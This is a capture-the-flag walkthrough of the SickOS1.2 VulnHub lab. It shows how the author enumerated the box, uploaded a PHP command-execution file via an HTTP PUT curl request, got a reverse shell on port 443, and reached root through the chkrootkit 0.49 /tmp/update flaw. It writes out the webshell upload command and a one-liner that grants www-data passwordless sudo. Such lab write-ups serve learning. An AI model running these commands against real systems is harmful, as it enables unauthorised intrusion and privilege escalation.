SickOS1.2 vulnhub Walkthrough
The main purpose of writing this walkthrough is this is a tricky machine and I learnt a lot from it. So I am trying to explain here even the simple gaps and tricky parts in detail which might have been persisted in mind of newbies like me.
ENUMERATION
Starting with netdiscover to know the IP: #netdiscover -r 10.0.2.0/24
Doing an nmap fullport scan on the target:
root@kali:~/Downloads/vuln/SickOS2# nmap -Pn -p- -A -o fullport.nmap 10.0.2.10
We see here port 22 and 80 open.
SSH Enumeration
I tried SSH OpenSSH 5.9p1 on searchsploit which gave me nothing. Also anonymous login wan’t allowed.
HTTP Enumeration
As always we will do a quick nikto scan on the target. Followed by dirbuster scan.
Nikto scan gave some information disclosure
- Lighttpd/1.4.28 : lighttpd (pronounced “lighty”) is an open-source web server optimized for speed-critical environments while remaining standards-compliant, secure and flexible
- PHP/5.3.10-ubuntu3.21
Let us open our target on website. So we view it’s source code
This shows
<! — NOTHING IN HERE ///\\\ →>>>
Then we do is find an exploit for lighttpd 1.4.28 if any exist. For this I used searchsploit. Here we find the following vulnerability of directory traversal + information disclosure
But on doing some tricks like http://10.0.2.10/../../../../../../../../../etc/passwd it changed to http://10.0.2.10/etc/passwd , which confirmed no directory traversal
Time for a dirbuster scan:
Our dirbuster scan revealed only 3 things:
- /index.php — we have visited
- /
- /test/
Opened http://10.0.2.10/test . It shows only option to backtrack to parent directory and nothing much in source code.
So I tried using different HTTP Methods like
- TRACE
- PUT
- HEAD
- OPTIONS // works here as if it was webdav directory
- PUT // worked here to upload a php payload . So it’s time for exploitation.
EXPLOITATION
To do exploitation let’s make a start with curl request to upload a php file.
I used msfvenom to make a payload under abcd.php
Have you got your abcd.php created by msfvenom, open exploit/multi/handler module on msfconsole and start the listener.
Then open abcd.php and to get a reverse shell. But we see we don’t get a shell. So we can once try that manually, by making a curl request
root@kali:~/Downloads/vuln/SickOS2# curl — silent -X PUT 10.0.2.10/test/execute.php -H ‘Expect: ‘ -d “<?php echo shell_exec(‘id’); ?>”
Doing this gives following output on accessing http://10.0.2.10/test/execute.php
So we know we can execute a command from shell. So we will use netcat then, we set a listener from our machine on at port say 1234
Now make a curl request to put a file which executes netcat to connect back to our machine on port 1234
But when we executed the script on http://10.0.2.10/test/execute.php. We didn’t get connected back.
This means connection from any random port is blocked on this machine…..
Tricky part: So now we will enumerate the ports common for connection which remain open. For this we will write a script containing for loop, to try connection on each port one by one and send the result.
And we run this script. It says it can connect back to port 443. So we will make php payload on msfvenom using this port
Upload it to site and open msfconsole exploit/multi/handler.
And we got the shell
PRIVILEGE ESCALATION
This is a very tricky machine. I enumerated approximately everything on machine and I couldn’t find anything. But in /etc/cron.daily there was chkrootkit process running.
On enumerating with command.
#dpkg -l
I found chkrootkit as an application installed.
The vulnerability of chkrootkit version 0.49 lies in fact that code under /tmp/update folder executes, if there is no value in file_port when chkrootkit was running as root.
Following is code explanation
#
# SLAPPER.{A,B,C,D} and the multi-platform variant
#
slapper (){
SLAPPER_FILES=”${ROOTDIR}tmp/.bugtraq ${ROOTDIR}tmp/.bugtraq.c”
SLAPPER_FILES=”$SLAPPER_FILES ${ROOTDIR}tmp/.unlock ${ROOTDIR}tmp/httpd \
${ROOTDIR}tmp/update ${ROOTDIR}tmp/.cinik ${ROOTDIR}tmp/.b”a
SLAPPER_PORT=”0.0:2002 |0.0:4156 |0.0:1978 |0.0:1812 |0.0:2015 “
OPT=-an
STATUS=0
file_port=
if ${netstat} “${OPT}”|${egrep} “^tcp”|${egrep} “${SLAPPER_PORT}”>
/dev/null 2>&1
then
STATUS=1
[ “$SYSTEM” = “Linux” ] && file_port=`netstat -p ${OPT} | \
$egrep ^tcp|$egrep “${SLAPPER_PORT}” | ${awk} ‘{ print $7 }’ |
tr -d :`
fi
for i in ${SLAPPER_FILES}; do
if [ -f ${i} ]; then
file_port=$file_port $i
STATUS=1
fi
done
if [ ${STATUS} -eq 1 ] ;then
echo “Warning: Possible Slapper Worm installed ($file_port)”
else
if [ “${QUIET}” != “t” ]; then echo “not infected”; fi
return ${NOT_INFECTED}
fi
}
As I have highlighted the variables SLAPPER_FILES and SLAPPER_PORT are assigned some values of files in paths, with ports to look at.
The vulnerability lies in the fact that if file_port=$file_port $i , statement executes and the $file_port was empty, then new value to file_port will become equal to $i , i.e. file name each time the loop runs, where one of them is /tmp/update.
Exploit : We will add /tmp/update — a file with malicious code. Because /tmp/ is world writable. And chkrootkit will run as root.
Here we can write for example any one of the following :
- reverse shell one liner
- #!/bin/sh to be executed
- Add our user to sudoer’s list with no password required for sudo task and make sudoers list accessible for read to user and group.
www-data@ubuntu:/tmp$ echo ‘chmod 777 /etc/sudoers && echo “www-data ALL=NOPASSWD: ALL” >> /etc/sudoers && chmod 440 /etc/sudoers’ > /tmp/update
Now since this script runs daily, we will need to wait for a day. I gave a try to last one, because first didn’t seem to work for me. I don’t know why, though. Then I modified file permissions of /tmp/update to be executable too.
And we get the root, that too in few minutes. So I grabbed the flag.
Actually chkrootkit was running after every minute, which I found during post exploitation of root.
This box was quite tricky and took a lot’s of googling plus a small amount of cheating and a lots of time. But I learnt a lot. Hope so you did the same!!!
